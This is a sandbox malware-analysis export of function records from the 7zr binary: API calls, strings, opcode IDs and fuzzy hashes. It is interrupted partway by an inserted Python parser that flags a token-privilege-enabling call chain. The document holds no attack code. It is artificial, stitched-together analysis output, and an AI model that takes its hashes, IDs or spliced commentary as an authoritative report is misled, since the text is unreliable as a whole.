                                                          • API ID: H_prologfputs$fputc
                                                          • String ID:
                                                          • API String ID: 678540050-0
                                                          • Opcode ID: 25c84d0bf819771f06e4f910dd84f3a1044038e5000f22ab6d7709cd4ba842f0
                                                          • Instruction ID: 574994b005ef33a3e0ad67c8df6fcb3307222d0b3c1ed9a63b1a1b1f6b2aa3dd
                                                          • Opcode Fuzzy Hash: 25c84d0bf819771f06e4f910dd84f3a1044038e5000f22ab6d7709cd4ba842f0
                                                          • Instruction Fuzzy Hash: 8A117031A04115ABCB09BBA0DA13AAEBFA6EF84750F40006BF503A23D1DF655A41CAD4
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00AF2CE0
                                                            • Part of subcall function 00AD5E10: __EH_prolog.LIBCMT ref: 00AD5E15
                                                            • Part of subcall function 00AE41EC: _CxxThrowException.MSVCRT(?,00B84A58), ref: 00AE421A
                                                            • Part of subcall function 00AD965D: VariantClear.OLEAUT32(?), ref: 00AD967F
                                                          Strings
                                                          • Cannot create output directory, xrefs: 00AF3070
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                           • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: H_prolog$ClearExceptionThrowVariant
                                                          • String ID: Cannot create output directory
                                                          • API String ID: 814188403-1181934277
                                                          • Opcode ID: 4299426d9ec0691271f334d4d4bd3698764da96ee50c84c2ff693b092434daaf
                                                          • Instruction ID: 7faf816c3a5bfb6d9d8294db830f5b38b6be5b96a90325837e4df36ebf2ccd4e
                                                          • Opcode Fuzzy Hash: 4299426d9ec0691271f334d4d4bd3698764da96ee50c84c2ff693b092434daaf
                                                          • Instruction Fuzzy Hash: BCF19D3190028DAFCF25EFE4C991AFDBBB5AF18300F1441AAF546A7252DB30AE55CB51
                                                          APIs
                                                          • fputs.MSVCRT ref: 00B0C840
                                                            • Part of subcall function 00AD25CB: _CxxThrowException.MSVCRT(?,00B84A58), ref: 00AD25ED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                           • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: ExceptionThrowfputs
                                                          • String ID:
                                                          • API String ID: 1334390793-399585960
                                                          • Opcode ID: 4b8f9d922c286f3e5df9fcced689188824e55bdab165996b4013087363022d86
                                                          • Instruction ID: 42800a409db688d8790bdb5a648b704136037633e5b99ab356ef03d3c3d6572b
                                                          • Opcode Fuzzy Hash: 4b8f9d922c286f3e5df9fcced689188824e55bdab165996b4013087363022d86
                                                          • Instruction Fuzzy Hash: 6411B2716047449FDB15CF58C8C1BAABFE6EF49304F0485AEE1468B291D7B5BC44C760
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                           • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: fputs
                                                          • String ID: Open
                                                          • API String ID: 1795875747-71445658
                                                          • Opcode ID: 65a5876e0f55cb8acce5ea1d95be45f00405cc5230d6a0f46314e63b54e9969d
                                                          • Instruction ID: 10a970758f2de10274a5e1c55147031d230ec2c284c0644a047fced57673c6c1
                                                          • Opcode Fuzzy Hash: 65a5876e0f55cb8acce5ea1d95be45f00405cc5230d6a0f46314e63b54e9969d
                                                          • Instruction Fuzzy Hash: F4119A321057049FC720EF74D991ADABBE1EF24310F40896FE19A93252DB31A954CF50
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00B206B3
                                                          • _CxxThrowException.MSVCRT(?,00B8D480), ref: 00B208F2
                                                            • Part of subcall function 00AD1E0C: malloc.MSVCRT ref: 00AD1E1F
                                                            • Part of subcall function 00AD1E0C: _CxxThrowException.MSVCRT(?,00B84B28), ref: 00AD1E39
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                           • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: ExceptionThrow$H_prologmalloc
                                                          • String ID:
                                                          • API String ID: 3044594480-0
                                                          • Opcode ID: 1b5e71aa98bf14b176dd217b4f0ef51236c0d854f30b5438cbb8e452633c3230
                                                          • Instruction ID: da43343746f42b17ec00f407608031e558bf04bef5faa8b68804117509667391
                                                          • Opcode Fuzzy Hash: 1b5e71aa98bf14b176dd217b4f0ef51236c0d854f30b5438cbb8e452633c3230
                                                          • Instruction Fuzzy Hash: 78913A71900259DFCB21EFA8D881AEEBBF5FF09304F1441A9E459A7252DB30AE45CF61
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                           • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: 7ae330f6993c99ab2466dc369287c5c58d3b5f0bb7ce72de20c9ee3c9713a6ac
                                                          • Instruction ID: 709bc9781f2bf6e3eefdae50687d64cba37235128422ca9e79f6411c2e7c80a6
                                                          • Opcode Fuzzy Hash: 7ae330f6993c99ab2466dc369287c5c58d3b5f0bb7ce72de20c9ee3c9713a6ac
                                                          • Instruction Fuzzy Hash: C1F1BB71A047C5DFCF25DF65C590AAABBF1BF28344F144CAEE49A9B211D730A944CB21
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00AE4255
                                                            • Part of subcall function 00AE440B: __EH_prolog.LIBCMT ref: 00AE4410
                                                            • Part of subcall function 00AD1E0C: malloc.MSVCRT ref: 00AD1E1F
                                                            • Part of subcall function 00AD1E0C: _CxxThrowException.MSVCRT(?,00B84B28), ref: 00AD1E39
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                           • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: H_prolog$ExceptionThrowmalloc
                                                          • String ID:
                                                          • API String ID: 3744649731-0
                                                          • Opcode ID: 22eb2b502d9337fb0edd0f4d3976c4fed682d5c199d36c1ed0def790207a9527
                                                          • Instruction ID: c4f30cc818543523342099305d6b23b94e0acf319c59f7b992ce044a2858dd32
                                                          • Opcode Fuzzy Hash: 22eb2b502d9337fb0edd0f4d3976c4fed682d5c199d36c1ed0def790207a9527
                                                          • Instruction Fuzzy Hash: E351F5B1401B84CFC725DF69C28468AFBF4BF19304F5489AEC4AE97752D7B0A608CB61
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                           • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: e1cdffe59bb4ececcd820c9abf45c8a6708de023144ec3c3affcf26bc656a524
                                                          • Instruction ID: 481a9dab91b568ec5b8bb2f7e1ef375b87fbace76706a30e13e233ab8f71a7de
                                                          • Opcode Fuzzy Hash: e1cdffe59bb4ececcd820c9abf45c8a6708de023144ec3c3affcf26bc656a524
                                                          • Instruction Fuzzy Hash: 6E31F8B1900209DBCB14EF95C991CBEFBB5FF94364B208559F62AA7252C7709D01CBA0
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00AF021F
                                                            • Part of subcall function 00AE3D66: __EH_prolog.LIBCMT ref: 00AE3D6B
                                                            • Part of subcall function 00AE3D66: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00AE3D7D
                                                            • Part of subcall function 00AE3D66: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00AE3D94
                                                            • Part of subcall function 00AE3D66: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00AE3DB6
                                                            • Part of subcall function 00AE3D66: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00AE3DCB
                                                            • Part of subcall function 00AE3D66: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00AE3DD5
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                           • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                           • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: H_prologProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                          • String ID:
                                                          • API String ID: 1532160333-0
                                                          • Opcode ID: 5aa4a20914154aff2be19f9393429f41b2b900ad9b29114787dd95fd43b3bb7a
                                                          • Instruction ID: c2e2f129d67e635f3c7867ffc5aae5758f74798365d9ee720afc7cab522ed4d4
                                                          • Opcode Fuzzy Hash: 5aa4a20914154aff2be19f9393429f41b2b900ad9b29114787dd95fd43b3bb7a
                                                          • Instruction Fuzzy Hash: 7C2139B1846B90CFC321CF6B86D0686FFF4BB19600B9499AED1DA83B12C374A508CF55
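The record above lists, under subcall function 00AE3D66, the standard sequence by which a process turns on a privilege in its own token: GetCurrentProcess, OpenProcessToken with DesiredAccess 00000028 (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY), LookupPrivilegeValueW for SeSecurityPrivilege, AdjustTokenPrivileges, then GetLastError to check for ERROR_NOT_ALL_ASSIGNED. Because these per-function records are machine generated and numerous, a responder will usually want to parse them rather than read them. The following Python is an added example written for this page; it is not code from the Joe Sandbox report, from 7-Zip (the 7zr snapshot these records come from) or from the analysed sample. It parses records in the format shown on this page and reports every record whose API list contains that privilege-enabling chain, with the token access mask decoded. The SAMPLE text is constructed from the record above plus a second record assembled from other lines on this page; treating each "APIs" heading as the start of a record, and the exact "Part of subcall function" wording, are assumptions about the export format taken from how the page renders it.

```python
"""Parse Joe Sandbox IDA-plugin function records and extract privilege-enabling
Win32 call chains. Added example; not code from the report, 7-Zip or the sample."""
import re
from dataclasses import dataclass, field
from typing import Optional

BULLET = "\u2022"  # the report renders every item with a "•" marker
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Matches "__EH_prolog.LIBCMT ref: 00AF021F" (no argument list) as well as
# "Part of subcall function 00AE3D66: OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 00AE3D94"
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<ref>[0-9A-F]{8})$")

# Token access rights from winnt.h; OpenProcessToken's second argument is this mask.
TOKEN_RIGHTS = {
    0x0001: "TOKEN_ASSIGN_PRIMARY", 0x0002: "TOKEN_DUPLICATE", 0x0004: "TOKEN_IMPERSONATE",
    0x0008: "TOKEN_QUERY", 0x0010: "TOKEN_QUERY_SOURCE", 0x0020: "TOKEN_ADJUST_PRIVILEGES",
    0x0040: "TOKEN_ADJUST_GROUPS", 0x0080: "TOKEN_ADJUST_DEFAULT", 0x0100: "TOKEN_ADJUST_SESSIONID",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list               # argument values as the analyser recovered them ("?" = unknown)
    ref: str                 # address of the call site
    subcall: Optional[str]   # callee address when listed as "Part of subcall function"


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    similarity: dict = field(default_factory=dict)  # API ID, Opcode ID, fuzzy hashes, ...


def parse_records(text):
    """One FunctionRecord per 'APIs' heading (assumed record delimiter in this export)."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                current = FunctionRecord()
                records.append(current)
            section = line
        elif current is not None and line.startswith(BULLET):
            item = line[len(BULLET):].strip()
            if section == "APIs" and (m := API_RE.match(item)):
                args = [a for a in (m["args"] or "").split(",") if a]
                current.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
            elif section == "Strings" and (m := STRING_RE.match(item)):
                current.strings.append((m["text"], m["ref"]))
            elif section == "Similarity":
                key, _, value = item.partition(":")
                current.similarity[key.strip()] = value.strip()
    return records


def decode_token_access(mask):
    """Expand an OpenProcessToken access mask into winnt.h right names, lowest bit first."""
    return [name for bit, name in sorted(TOKEN_RIGHTS.items()) if mask & bit]


def privilege_enables(records):
    """(record index, privilege name, token rights) for each record that opens a token
    and calls AdjustTokenPrivileges; the LookupPrivilegeValue* argument names the privilege."""
    hits = []
    for i, rec in enumerate(records):
        if not {"OpenProcessToken", "AdjustTokenPrivileges"} <= {c.name for c in rec.apis}:
            continue
        privilege, rights = None, []
        for call in rec.apis:
            if call.name.startswith("LookupPrivilegeValue") and len(call.args) > 1:
                privilege = call.args[1]                # second argument: lpName
            elif call.name == "OpenProcessToken" and len(call.args) > 1:
                try:
                    rights = decode_token_access(int(call.args[1], 16))  # DesiredAccess
                except ValueError:
                    pass                                # "?" when the analyser lost the value
        hits.append((i, privilege, rights))
    return hits


# Constructed input: the 00AF021F record from the report plus a second record
# assembled from other lines on the page, so the filter has something to reject.
SAMPLE = """\
APIs
• __EH_prolog.LIBCMT ref: 00AF021F
  • Part of subcall function 00AE3D66: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00AE3D7D
  • Part of subcall function 00AE3D66: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00AE3D94
  • Part of subcall function 00AE3D66: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00AE3DB6
  • Part of subcall function 00AE3D66: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00AE3DCB
  • Part of subcall function 00AE3D66: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00AE3DD5
Similarity
• API ID: H_prologProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
• String ID:
• API String ID: 1532160333-0
APIs
• __EH_prolog.LIBCMT ref: 00AF2CE0
Strings
• Cannot create output directory, xrefs: 00AF3070
Similarity
• API ID: H_prolog$ClearExceptionThrowVariant
• String ID: Cannot create output directory
"""

if __name__ == "__main__":
    for idx, priv, rights in privilege_enables(parse_records(SAMPLE)):
        print(f"record {idx}: enables {priv} on a token opened with {' | '.join(rights)}")
```

Run against a whole exported report the same way; the Similarity dictionary keeps the Opcode ID and Instruction Fuzzy Hash of each record, so hits can be matched against other samples without re-reading the dump. Note that this chain is what any archiver that restores security descriptors needs, and these records are from the bundled 7zr, so a hit here is context for the "Enables security privileges" finding rather than proof of malicious intent on its own.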
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00B0C0B8
                                                            • Part of subcall function 00AF7193: __EH_prolog.LIBCMT ref: 00AF7198
                                                            • Part of subcall function 00AD1E40: free.MSVCRT ref: 00AD1E44
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: H_prolog$free
                                                          • String ID:
                                                          • API String ID: 2654054672-0
                                                          • Opcode ID: 1a007983d913b522ea2afc5eaa0c211466b32329b39906e07426805cd2be281a
                                                          • Instruction ID: 51d1132713752a5bd4acc528668f88af50743118a30c4759a24544ff398d16a8
                                                          • Opcode Fuzzy Hash: 1a007983d913b522ea2afc5eaa0c211466b32329b39906e07426805cd2be281a
                                                          • Instruction Fuzzy Hash: 10F0B472A00211DBD725AB89D9817AEFBE9EF54760F1002AFE402A7651DFB1DC10C690
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00B10364
                                                            • Part of subcall function 00B101C4: __EH_prolog.LIBCMT ref: 00B101C9
                                                            • Part of subcall function 00B10143: __EH_prolog.LIBCMT ref: 00B10148
                                                            • Part of subcall function 00AD1E40: free.MSVCRT ref: 00AD1E44
                                                            • Part of subcall function 00B103D8: __EH_prolog.LIBCMT ref: 00B103DD
                                                            • Part of subcall function 00B1004A: __EH_prolog.LIBCMT ref: 00B1004F
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: H_prolog$free
                                                          • String ID:
                                                          • API String ID: 2654054672-0
                                                          • Opcode ID: 8ab04823c3890bedcef6c9bba16d3596913eb3db7a8b584c81d5ac71205ceb70
                                                          • Instruction ID: 94942024bb1fe16699b9a241a244591643a24ece6721e333b48fee06fe141930
                                                          • Opcode Fuzzy Hash: 8ab04823c3890bedcef6c9bba16d3596913eb3db7a8b584c81d5ac71205ceb70
                                                          • Instruction Fuzzy Hash: 56F0D131924A50EECB19FBA8D5223EDBBE4AF04314F50469DE066622D2CFF85A448744
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: a6148cdafad731cd5c77807d6e8acd0dba3005066e0cc64dcc509e696b704690
                                                          • Instruction ID: f2e7c83fe34c43a4a5a9fb13388af146218d729910eb902bca2995f6006742f7
                                                          • Opcode Fuzzy Hash: a6148cdafad731cd5c77807d6e8acd0dba3005066e0cc64dcc509e696b704690
                                                          • Instruction Fuzzy Hash: 7EF04F72E1111AABCB14DF98D8409AFBBB5FF54750B14819AF456E7251CB348A05CB90
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: fputs
                                                          • String ID:
                                                          • API String ID: 1795875747-0
                                                          • Opcode ID: aff8ad7d0de46af7325ec9bce5131739cfed69abb1bc43db1b07abd079a5a46f
                                                          • Instruction ID: 611287775430d138f30085da5a573debfb4dbc5eea8b5bbf0dc9931fbb22f459
                                                          • Opcode Fuzzy Hash: aff8ad7d0de46af7325ec9bce5131739cfed69abb1bc43db1b07abd079a5a46f
                                                          • Instruction Fuzzy Hash: 8AD01232504119ABCF156B94DC05CDD7BBCEF08214700442FF545F2150EA75E5149794
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00B280AF
                                                            • Part of subcall function 00AD1E0C: malloc.MSVCRT ref: 00AD1E1F
                                                            • Part of subcall function 00AD1E0C: _CxxThrowException.MSVCRT(?,00B84B28), ref: 00AD1E39
                                                            • Part of subcall function 00B1BDB5: __EH_prolog.LIBCMT ref: 00B1BDBA
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: H_prolog$ExceptionThrowmalloc
                                                          • String ID:
                                                          • API String ID: 3744649731-0
                                                          • Opcode ID: eff143f9bf7641e780f659d53d8d798f8596b1b77e41f721e96e7ce0942859e8
                                                          • Instruction ID: e3d30c95a3eef0c9575f1401dc75e1c3f91151d86421da87ecda1e0d05fa978c
                                                          • Opcode Fuzzy Hash: eff143f9bf7641e780f659d53d8d798f8596b1b77e41f721e96e7ce0942859e8
                                                          • Instruction Fuzzy Hash: F0D01771A01101AECB08EBB4A52276E72E1EB44300F0045BEA02AE2781EF7489008614
                                                          APIs
                                                          • FindClose.KERNELBASE(00000000,?,00AD6880), ref: 00AD6853
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: CloseFind
                                                          • String ID:
                                                          • API String ID: 1863332320-0
                                                          • Opcode ID: 0cb1fd9f7882285fe93640b6c26667334d89ada4243a789385f5fd640a64b6b7
                                                          • Instruction ID: e7da4007c617df9e9b8d4b593da8d53891715fa6b7321c9a775dac79fedaca31
                                                          • Opcode Fuzzy Hash: 0cb1fd9f7882285fe93640b6c26667334d89ada4243a789385f5fd640a64b6b7
                                                          • Instruction Fuzzy Hash: 2CD01231104221468A645F7D78449C937D86F06334321075EF0B5D32E1D7608CC36650
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmp
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: fputs
                                                          • String ID:
                                                          • API String ID: 1795875747-0
                                                          • Opcode ID: 0103f33fc7c149f85b2973f150387715554e0c66a5a7bece25675265a67891fb
                                                          • Instruction ID: 5414ab28a329f011401210a2df01f787385fd392670e05e3ba97096d124c1e38
                                                          • Opcode Fuzzy Hash: 0103f33fc7c149f85b2973f150387715554e0c66a5a7bece25675265a67891fb
                                                          • Instruction Fuzzy Hash: A3D0C936008251AF96256F15EC09C8BBFA9FFE5321721082FF480921709B626D65DAA0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
